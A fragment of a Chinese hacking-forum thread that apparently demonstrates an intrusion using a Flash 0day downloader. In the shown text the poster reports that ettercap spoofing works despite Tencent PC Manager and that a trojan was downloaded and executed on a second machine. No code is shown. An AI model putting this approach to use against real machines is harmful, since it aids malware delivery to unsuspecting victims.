<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">我靠我发现直接用</span></span><span style="font-family:宋体;font-size:10.5000pt;">ettercap<span style="font-family:宋体;">欺骗物理机装了腾讯管家照样可以欺骗成功,如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="269" src="https://www.2k8.org/content/uploadfile/201809/22/9a87c875d5304b7981109e923274b87e.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">我们看另一台,</span></span><span style="font-family:Calibri;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">提示这个错误,说明木马是成功被下载执行了,</span></span><img width="553" height="307" src="https://www.2k8.org/content/uploadfile/201809/22/0e644f45c0c842a097fbb6a86fab5ad6.jpg" /><span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">只是由于某些原因没上线而已。。。</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
页: [1]
查看完整版本: flash 0day之手工代码修改制作下载者实例入侵演示